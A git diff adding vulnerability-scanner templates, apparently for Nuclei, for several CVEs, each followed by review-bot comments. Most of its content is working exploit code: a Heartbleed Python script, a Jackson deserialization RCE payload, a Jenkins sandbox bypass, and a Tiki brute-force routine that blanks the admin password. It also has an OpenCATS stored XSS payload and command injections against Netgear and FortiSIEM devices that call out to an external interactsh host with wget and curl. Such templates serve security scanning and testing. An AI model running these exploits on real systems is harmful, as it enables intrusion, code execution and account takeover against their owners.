@@ -0,0 +1,48 @@ +id: k8s-liveness-probe-not-configured + +info: + name: Liveness Probe Not Configured in Deployments + author: princechaddha + severity: medium + description: Checks for missing liveness probes in Kubernetes Deployments, which are essential for managing container health and automatic recovery + impact: | + Absence of liveness probes can lead to unresponsive containers remaining in service, potentially degrading application performance and availability. + remediation: Configure liveness probes for all containers in Kubernetes Deployments to ensure proper health checks and automatic restarts of failing containers + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.livenessProbe)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks a configured liveness probe.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a0047304502203467396f69842d95717ea1f6208909f0301e79ef8e16b19ad5e20978826124f2022100b31af5d5f6daf8463350c27aaf6398d6f27378fa5858cc4f1908749790a1dcc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-0160.yaml b/poc/cve/CVE-2014-0160.yaml new file mode 100644 index 0000000000..9f07823532 --- /dev/null +++ b/poc/cve/CVE-2014-0160.yaml 
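Review bot: `containers.some(container => container.livenessProbe)` treats a Deployment as compliant as soon as one container has a probe, but the `remediation` says all containers need one, so a multi-container pod with a single probed container is never reported. Use `!deployment.spec.template.spec.containers.every(c => c.livenessProbe)` and list the unprobed container names in the message so the finding is actionable. The trailing `# digest:` line is the upstream template signature; any edit to the body invalidates it, so either re-sign or drop the line.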
@@ -0,0 +1,137 @@ +id: CVE-2014-0160 + +info: + name: OpenSSL Heartbleed Vulnerability + author: pussycat0x + severity: high + description: | + The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users. + reference: + - https://github.com/vulhub/vulhub/tree/master/openssl/CVE-2014-0160 + metadata: + verified: true + tags: cve,cve2014,openssl,heartbleed,code + +variables: + url: "{{RootURL}}" + +code: + - engine: + - py + - python3 + source: | + import os + import struct + import socket + import time + import select + from urllib.parse import urlparse + + def h2bin(x): + return bytes.fromhex(x.replace(' ', '').replace('\n', '')) + + hello = h2bin(''' + 16 03 02 00 dc 01 00 00 d8 03 02 53 + 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf + bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 + 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 + 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c + c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 + c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 + c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c + c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 + 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 + 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 + 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 + 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 + 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 + 00 0f 00 01 01 + ''') + + hb = h2bin(''' + 18 03 02 00 03 + 01 40 00 + ''') + + def recvall(s, length, timeout=5): + endtime = time.time() + timeout + rdata = b'' + remain = length + while remain > 0: + rtime = endtime - time.time() + if rtime < 0: + return None + 
r, _, _ = select.select([s], [], [], 5) + if s in r: + data = s.recv(remain) + if not data: + return None + rdata += data + remain -= len(data) + return rdata + + def recvmsg(s): + hdr = recvall(s, 5) + if hdr is None: + return None, None, None + typ, ver, ln = struct.unpack('>BHH', hdr) + pay = recvall(s, ln, 10) + if pay is None: + return None, None, None + return typ, ver, pay + + def hit_hb(s): + s.send(hb) + while True: + typ, ver, pay = recvmsg(s) + if typ is None: + return False + if typ == 24: # Heartbeat response + if len(pay) > 3: + print('server is vulnerable') + return True + return False + if typ == 21: # Server alert + return False + + def main(): + # Get the URL from the environment variable + url = os.getenv('url') + if not url: + print("URL environment variable is not set.") + return + + # Parse the URL + parsed_url = urlparse(url) + host = parsed_url.hostname + port = parsed_url.port if parsed_url.port else 443 + + if not host: + return + + # Create a socket connection + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + # Send Client Hello + s.send(hello) + + # Wait for Server Hello + while True: + typ, ver, pay = recvmsg(s) + if typ is None: + return + if typ == 22 and pay[0] == 0x0E: # Server hello done + break + + # Send Heartbeat request and check vulnerability + s.send(hb) + hit_hb(s) + + if __name__ == '__main__': + main() + + matchers: + - type: dsl + dsl: + - "contains(response,'server is vulnerable')" diff --git a/poc/cve/CVE-2016-8735.yaml b/poc/cve/CVE-2016-8735.yaml new file mode 100644 index 0000000000..cf1f824eb9 --- /dev/null +++ b/poc/cve/CVE-2016-8735.yaml 
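Review bot: The socket created in `main()` has no timeout: `s.connect()` and the initial `recvmsg` loop can block for as long as the OS allows against a filtered port, and the socket is never closed. Add `s.settimeout(10)` right after `socket.socket(...)` and wrap the handshake in `try: ... finally: s.close()`. `main()` also sends the heartbeat (`s.send(hb)`) immediately before calling `hit_hb(s)`, which sends it again; the duplicate requests a second 16 KB leak from the target for no benefit, so remove the send in `main()`. `recvall` computes `rtime` but always selects with a fixed `5`; pass `rtime` instead so the `timeout` argument is honoured.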
@@ -0,0 +1,87 @@ +id: CVE-2016-8735-tomcat-jmx-rce + +info: + name: Apache Tomcat JMX Remote Code Execution + author: your_github_username + severity: critical + description: Apache Tomcat versions before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 are vulnerable to remote code execution if JmxRemoteLifecycleListener is used and the JMX ports are exposed. + reference: + - http://rhn.redhat.com/errata/RHSA-2017-0457.html + - http://www.securityfocus.com/bid/94463 + - http://tomcat.apache.org/security-9.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2016-8735 + tags: cve,cve2016,apache,tomcat,rce,jmx + +http: + - method: GET + path: + - "{{BaseURL}}/manager/status" + - "{{BaseURL}}:8080/manager/status" + - "{{BaseURL}}:8000/manager/status" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Apache Tomcat" + part: body + + extractors: + - type: regex + name: version + group: 1 + regex: + - "Apache Tomcat/([0-9.]+)" + + - method: GET + path: + - "{{BaseURL}}:{{jmx_ports}}" + attack: batteringram + payloads: + jmx_ports: + - "1099" + - "9999" + - "8999" + + matchers-condition: and + matchers: + - type: word + words: + - "JMX" + - "RMI" + condition: and + - type: status + status: + - 200 + + extractors: + - type: regex + name: jmx_port + group: 1 + regex: + - ":([0-9]+)" + + - method: GET + path: + - "{{BaseURL}}/manager/jmxproxy" + + matchers-condition: and + matchers: + - type: word + words: + - "JMXProxyServlet" + - type: dsl + dsl: + - 'version != "" && jmx_port != "" && (version < "6.0.48" || (version >= "7.0.0" && version < "7.0.73") || (version >= "8.0.0" && version < "8.0.39") || (version >= "8.5.0" && version < "8.5.7") || (version >= "9.0.0" && version < "9.0.0.M12"))' + + extractors: + - type: regex + name: jmxproxy + regex: + - "JMXProxyServlet" 
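Review bot: The final DSL matcher compares Tomcat versions as strings (`version < "6.0.48"`, `version < "7.0.73"`), which is lexicographic: `"7.0.9"` is not less than `"7.0.73"` and `"10.0.0"` is less than `"6.0.48"`, so the gate is wrong in both directions; use the engine's version-comparison helper (`compare_versions(version, '< 6.0.48')` style) if available. The second request targets `{{BaseURL}}:{{jmx_ports}}`, which appends a second port to a URL that already carries one, and expects an RMI registry to answer an HTTP GET with a 200 containing `JMX` and `RMI`, which a JMX/RMI listener does not do, so `jmx_port` is never extracted and the final matcher can never pass. Confirming an exposed JMX listener needs a TCP/RMI probe rather than HTTP, and the version gate should stand on `/manager/status` alone. The `author` field is still the placeholder `your_github_username`, and the `id` does not follow the `CVE-YYYY-NNNN` convention used by the sibling templates.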
diff --git a/poc/cve/CVE-2017-7525.yaml b/poc/cve/CVE-2017-7525.yaml new file mode 100644 index 0000000000..75e8452097 --- /dev/null +++ b/poc/cve/CVE-2017-7525.yaml 
@@ -0,0 +1,63 @@ +id: CVE-2017-7525 + +info: + name: Jackson RCE - Unauthenticated Remote Code Execution + author: cheoljun99,KoYejune0302,sim4110,gy741 + severity: critical + description: | + Jackson Databind is a popular Java library used for serializing Java objects to JSON (JavaScript Object Notation) and deserializing JSON back into Java objects. + CVE-2017-7525 is a critical deserialization vulnerability in the Jackson library which allows for remote code execution. + Vulnerable environment is Jackson 2.8.8 + Send following request to use the Template to execute Java bytescode, which contains command touch /tmp/prove1.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-7525 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2017-7525 + - https://github.com/FasterXML/jackson-docs/wiki/JacksonPolymorphicDeserialization + - https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/ + - https://github.com/irsl/jackson-rce-via-spel + - https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1 + tags: Jackson,cve,cve2017,rce,unauth + +requests: + - raw: + - | + POST {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: */* + Accept-Language: en + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Connection: close + Content-Type: application/json + Content-Length: 1298 + + { + "param": [ + "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", + { + "transletBytecodes": [ + "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" + ], + "transletName": "a.b", + "outputProperties": {} + } + ] + } + + matchers-condition: and + matchers: + - type: status + status: + - 400 + + - type: word + part: header + words: + - application/json + + - type: word + words: + - "JSON parse error: null; nested exception is com.fasterxml.jackson.databind.JsonMappingException" \ No newline at end 
of file diff --git a/poc/cve/CVE-2019-1003000.yaml b/poc/cve/CVE-2019-1003000.yaml new file mode 100644 index 0000000000..30762e8ec6 --- /dev/null +++ b/poc/cve/CVE-2019-1003000.yaml 
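Review bot: The raw request posts to `{{path}}`, but no `variables:` block defines `path` anywhere in the hunk, so the request line is `POST  HTTP/1.1` unless the variable is injected at run time; define `path: "/"` (or the endpoint that deserializes untrusted JSON) under `variables:`, or document the required CLI variable in `description`. The payload executes `touch /tmp/prove1.txt` on the target, as the description itself says, which is a state-changing action; a scan-safe variant would use an OAST callback, and at minimum the description should carry an explicit warning. The matcher accepts any `400` plus `JsonMappingException`, and as far as I recall a patched Jackson returns a similar `JsonMappingException` ("Illegal type") when it blocks `TemplatesImpl`, so hardened hosts are likely reported as vulnerable; match the vulnerable-path error text or rely on the callback. `requests:` is the legacy key — the sibling templates use `http:`.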
@@ -0,0 +1,99 @@ +id: CVE-2019-1003000 + +info: + name: Jenkins Script Security Plugin - Sandbox Bypass + author: sttlr + severity: high + description: | + A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2019-1003000 + cpe: cpe:2.3:a:jenkins:script_security::::::jenkins::* + reference: + - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 + - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming + - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins + - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION + - https://github.com/purple-WL/Jenkins_CVE-2019-1003000 + - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc + metadata: + vendor: jenkins + product: script_security + tags: cve,cve2019,jenkins,code + +variables: + username: admin + vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}" + app_name: "{{rand_text_alpha(8)}}" + +flow: http(1,2) && (http(3) || http(4)) + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Jenkins" + - 'name="j_username"' + - 'name="j_password"' + internal: true + + - raw: + - | + POST /j_acegi_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "/logout")' + - 'contains(body_2, "[Jenkins]")' + 
condition: and + internal: true + + - raw: + - | + GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - raw: + - | + GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + part: interactsh_request + words: + - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom" diff --git a/poc/cve/CVE-2020-15906.yaml b/poc/cve/CVE-2020-15906.yaml new file mode 100644 index 0000000000..810dcf8f2b --- /dev/null +++ b/poc/cve/CVE-2020-15906.yaml 
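Review bot: Request 2 submits `j_password={{password}}`, but `variables:` only defines `username`, `vendor_name` and `app_name`, so `password` is empty unless supplied on the command line; either add it to `variables:` with a comment that it must be overridden, or state in `description` that the template requires `-var password=...` and an account allowed to submit sandboxed scripts. The `cpe` value `cpe:2.3:a:jenkins:script_security::::::jenkins::*` is malformed for CPE 2.3 (empty components instead of `*`); it should be `cpe:2.3:a:jenkins:script_security:*:*:*:*:*:jenkins:*:*`. Also note that the `checkScript` and `checkScriptCompile` payloads execute code on the Jenkins controller (a `ping` and a Grape resolver fetch), which is worth stating prominently since the metadata otherwise reads like a low-impact check.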
@@ -0,0 +1,150 @@ +id: CVE-2020-15906 + +info: + name: Tiki Wiki CMS GroupWare - Auth Bypass + author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu + severity: critical + description: | + tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. + reference: + - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-15906 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-15906 + cwe-id: CWE-307 + cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:* + metadata: + verified: true + vendor: Tiki Wiki CMS + product: Tiki Wiki CMS + shodan-query: title:"Tiki Wiki CMS" + fofa-query: title="Tiki Wiki CMS" + google-query: intitle:"Tiki Wiki CMS + tags: cve,cve2020,tiki,wiki,auth-bypass + +http: + - raw: + - | + GET /tiki-login_scr.php HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: ticket1 + internal: true + group: 1 + regex: + - 'class="ticket" name="ticket" value="(.*)"' + + - raw: + - | + POST /tiki-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/tiki-login_scr.php + + ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n + + payloads: + attempt: + - nkQ0yYzgF5Er + - P5UdGflH48W3 + - xFq7vKNLmhZp + - 8zKtGnh4dW5R + - CfXp2VbQz8Er + - Lh3K6vPzM9Xn + - bG4RxHpY2MdQ + - 7zNtKh3WqF5L + - Y8rQ2GpLx9Kn + - C7KzLmP5X9Vh + - v3LdX8GmQ5Kn + - W4NzX6PqL3Ft + - Q5GhY2VrX7Jk + - r9KdL4PhY6Gm + - 8XjVq5LhZ2Kr + - L5WnQ9KzY8Pr + - M2XdL5GrY9Kh + - N6YzP8WkL5Xt + - G7JqX5VbM2Kp + - H4PrX8LkY6Gm + - J5LhY2VqX9Kr + - 8GrX5NqL2KhY + - K4WnY9PzM8Xt + - Q2XkL5PrY8Vh + - 9JhL4VqX5GrM + - N2XdY5PqL9Kh + - W4LhY8KzM5Xt + - G5JqX2VrY9Kp + - H9PrL5XkY2Gm + - L8WnX5KzY9Pr + - M4XkY2LqV5Gt + - N5XdL9PqY8Kr + - P8XnL5VrY2Kh + - Q4JqX9LhY5Gr + - 
V7LkX5PrY2Gt + - L2WnY9KzX8Pr + - M9XdL5PqY4Kh + - N8LhY2VqX5Gr + - Q7XkL5PrY9Gm + - X4LhY8WnM5Kp + - G2JqL5VrY9Kt + - H7PrX8KzY2Gm + - J4LhY5VqX9Kr + - N9XkY2LqP5Gt + - W8LhY5PrX2Kz + - G4JqL5XkY9Vr + - P5WnY2KzL8Gt + - M7XkY9LhP2Gr + - Q2JqL5VrY8Kh + - 2JqL5VrY8Kh + attack: batteringram + threads: 50 + + - raw: + - | + GET /tiki-login_scr.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /tiki-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/tiki-login.php + + ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n + + extractors: + - type: regex + part: body_1 + name: ticket2 + internal: true + group: 1 + regex: + - 'class="ticket" name="ticket" value="(.*)"' + + - raw: + - | + GET /tiki-index.php HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "System Menu" + - "Home" + - "Search" + - "Wiki" + - "File Galleries" + - "Settings" + condition: and + + - type: word + words: + - "Show on admin log-in" + - "Tiki Setup" + condition: and diff --git a/poc/cve/CVE-2023-27294.yaml b/poc/cve/CVE-2023-27294.yaml new file mode 100644 index 0000000000..e1ab8d6c08 --- /dev/null +++ b/poc/cve/CVE-2023-27294.yaml 
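Review bot: The 50-payload `batteringram` step is the one that trips Tiki's lockout and, on a vulnerable host, leaves the admin account with a blank password — the template permanently weakens the target rather than merely observing it, yet nothing in `tags` or `metadata` marks it as state-changing; add `intrusive` to the tags and a one-line `metadata` note so operators opt in knowingly. All 50 attempts reuse the single `{{ticket1}}` extracted from the first request; if Tiki rotates that ticket per form render, later attempts may be rejected before the failure counter advances, which is worth confirming against the reference. The final payload `2JqL5VrY8Kh` looks like a truncated copy of the preceding `Q2JqL5VrY8Kh`; harmless, but a distinct value keeps the count honest. The first matcher's words (`Home`, `Search`, `Wiki`) are likely present on an unauthenticated index page too, so with `matchers-condition: or` the template can fire without the bypass having worked — the `Tiki Setup` matcher is the meaningful one.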
@@ -0,0 +1,64 @@ +id: CVE-2023-27294 + +info: + name: OpenCATS - Authenticated Stored XSS + author: woo4826, gy741, jyjyjy25, oriing, ANseunghyeon + severity: medium + description: | + OpenCATS version 0.9.6 contains a vulnerability that allows an authenticated user to perform a stored cross-site scripting (XSS) attack. This vulnerability exists due to improper sanitization of user-supplied input within the calendar event description field. An attacker can exploit this vulnerability by injecting malicious JavaScript code into the description of a calendar event, which will be executed in the context of another user’s browser when they view the event. + impact: | + An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest patch or update to the latest version of OpenCATS to fix the open redirect vulnerability. + reference: + - https://www.tenable.com/security/research/tra-2023-8 + - https://nvd.nist.gov/vuln/detail/CVE-2023-27294 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L + cvss-score: 6.1 + cve-id: CVE-2023-27294 + cwe-id: CWE-79 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats + shodan-query: + - title:"opencats" + - http.title:"opencats" + fofa-query: title="opencats" + google-query: intitle:"opencats" + tags: cve,cve2023,opencats,xss,authenticated,tenable + +http: + - raw: + - | + POST /index.php?m=calendar&view=MONTHVIEW&month=7&year=2024&week=-1&day=-1&a=addEvent HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Content-Length: {{Content-Length}} + Cookie: CATS={{cats_session_token}} + + 
postback=postback&title=test&type=600&publicEntry=on&dateAdd=07-30-24&allDay=1&sendEmail=admin%40testdomain.com&reminderTime=15&description=%3Cimg+src%3D%22http://localhost%2Fimages%2FapplicationLogo.jpg%22+onload%3D%22alert%28document.cookie%29%22%3E&submit=Add+Event + + - | + GET {{extracted_path}} HTTP/1.1 + Content-Length: {{Content-Length}} + Cookie: CATS={{cats_session_token}} + + extractors: + - type: regex + part: header + name: extracted_path + internal: true + regex: + - \/index[^?]*(\S+) + + matchers: + - type: word + words: + - "onload%3D%22alert%28document.cookie" + + diff --git a/poc/cve/CVE-2023-33533.yaml b/poc/cve/CVE-2023-33533.yaml new file mode 100644 index 0000000000..f6b204d20b --- /dev/null +++ b/poc/cve/CVE-2023-33533.yaml 
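Review bot: The `remediation` text tells readers to fix "the open redirect vulnerability", but this template (with `cwe-id: CWE-79` and an `xss` tag) covers a stored XSS in the calendar description — the sentence was copied from another template and should read `Apply the latest patch or update to the latest version of OpenCATS to fix the stored cross-site scripting vulnerability.` The `cvss-metrics` string lacks the `CVSS:3.1/` prefix the sibling templates use, and the vector given (PR:H/UI:R/C:H/I:H/A:L) does not produce the stated `cvss-score: 6.1` — 6.1 is the usual `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` reflected/stored XSS vector — so one of the two is wrong. The matcher looks for the percent-encoded `onload%3D%22alert%28document.cookie`, which would appear if the page echoed the raw parameter but not where the stored description is rendered, so matching the decoded `onload="alert(document.cookie)"` form is the stronger signal. `{{cats_session_token}}` is not declared in any `variables` block and the second request carries no `Host` header, so both depend on the runner supplying them; say so in `metadata`.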
@@ -0,0 +1,65 @@ +id: cve-2023-33533 + +info: + name: Netgear D6220/D8500/R6700/R6900 Authenticated Command Injection + author: CodeStuffBreakThings + severity: high + description: Netgear D6220 with Firmware Version 1.0.0.80, D8500 with Firmware Version 1.0.3.60, R6700 with Firmware Version 1.0.2.26, and R6900 with Firmware Version 1.0.2.26 are vulnerable to Command Injection. If an attacker gains web management privileges, they can inject commands into the post request parameters, gaining shell privileges. + remediation: Upgrade to a newer firmware version. Replace the router if it is end-of-life. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-33533 + - https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Exp.py + - https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Netgear_RCE.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-33533 + cwe-id: CWE-77 + tags: cve2023,cve,netgear,router,rce,oast,authenticated + +http: + - raw: + - | + GET /IPV6_fixed.htm HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic Zm9vOmRlZmF1bHQK + Referer: http://{{Host}}/IPV6_disable.htm + XSRF_TOKEN: 2267229739 + + - | + GET /IPV6_fixed.htm HTTP/1.1 + Host: {{Hostname}} + Referer: http://{{Host}}/IPV6_disable.htm + XSRF_TOKEN: {{xsrf_token}} + + - | + POST /ipv6_fix.cgi?id={{csrf_id}} HTTP/1.1 + Host: {{Hostname}} + Referer: http://{{Host}}/IPV6_disable.htm + XSRF_TOKEN: {{xsrf_token}} + Content-Type: text/plain + + 
apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=$(wget {{interactsh-url}})&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=aaa&ipv6_enable_dhcp=&ipv6_proto=fixed + + extractors: + - type: regex + name: xsrf_token + group: 1 + part: header + regex: + - 'Set-Cookie: XSRF_TOKEN=(.*?);' + internal: true + + - type: regex + name: csrf_id + group: 1 + part: body + regex: + - 'cgi\?id=([\w\d]+)' + internal: true + + matchers: + - type: word + part: interactsh_protocol + words: + - http diff --git a/poc/cve/CVE-2023-34992.yaml b/poc/cve/CVE-2023-34992.yaml new file mode 100644 index 0000000000..0a723bb996 --- /dev/null +++ b/poc/cve/CVE-2023-34992.yaml 
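Review bot: The first request carries a hard-coded `Authorization: Basic Zm9vOmRlZmF1bHQK` (which decodes to `foo:default` plus a trailing newline, the fingerprint of `echo | base64`), while the two requests that actually reach `ipv6_fix.cgi` carry no `Authorization` at all; since the issue is authenticated, that only works if the router binds the session to the extracted `XSRF_TOKEN` cookie rather than to per-request credentials, which is worth verifying. Take the credentials from variables instead, e.g. `Authorization: Basic {{base64(username + ':' + password)}}`, so the template does not ship a fixed password. The literal `XSRF_TOKEN: 2267229739` on the first request also looks like a captured value rather than something the template derives. Smaller points: `id: cve-2023-33533` is lower-case while every sibling uses `CVE-…`, and `metadata` (`max-request`, `verified`) is absent.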
@@ -0,0 +1,50 @@
+id: CVE-2023-34992
+
+info:
+ name: Fortinet FortiSIEM Unauthenticated Command Injection - CVE-2023-34992
+ author: thacien
+ severity: critical
+ description: An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM versions 7.1.0 through 7.1.1, 7.0.0 through 7.0.2, 6.7.0 through 6.7.8, 6.6.0 through 6.6.3, 6.5.0 through 6.5.2, and 6.4.0 through 6.4.3 allows an unauthenticated attacker to execute unauthorized code or commands via crafted API requests.
+ impact: Successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the affected system.
+ remediation: upgrade to FortiSIEM version >=6.4.4, >=6.5.3, >=6.6.4, >=6.7.9, >=7.0.3, >=7.1.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2023-34992
+ - https://www.horizon3.ai/attack-research/disclosures/cve-2023-34992-fortinet-fortisiem-command-injection-deep-dive/
+ - https://github.com/horizon3ai/CVE-2023-34992
+ - https://fortiguard.com/psirt/FG-IR-23-130
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2023-34992
+ cwe-id: CWE-78
+ epss-score: 0.00078
+ cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
+metadata:
+ verified: false
+ max-request: 1
+ vendor: fortinet
+ product: fortisiem
+ tags: CVE-2023-34992,fortisiem,network,cve,fortinet,rce,tcp,unauth
+
+# generate the payload to send a curl request to an OOB server
+variables:
+ - exploit: '\n 127.0.0.1; curl -k "{{interactsh_url}}";\n /test\n\n'
+ - payload: '{{51000000 + hex_encode(len("{{exploit}}")) + 0000006f421e4000000000}}'
+tcp:
+ - host:
+ - "tls://{{Hostname}}"
+ port: 7900
+ inputs:
+ - data: '{{hex_decode("{{payload}}") + exploit}}'
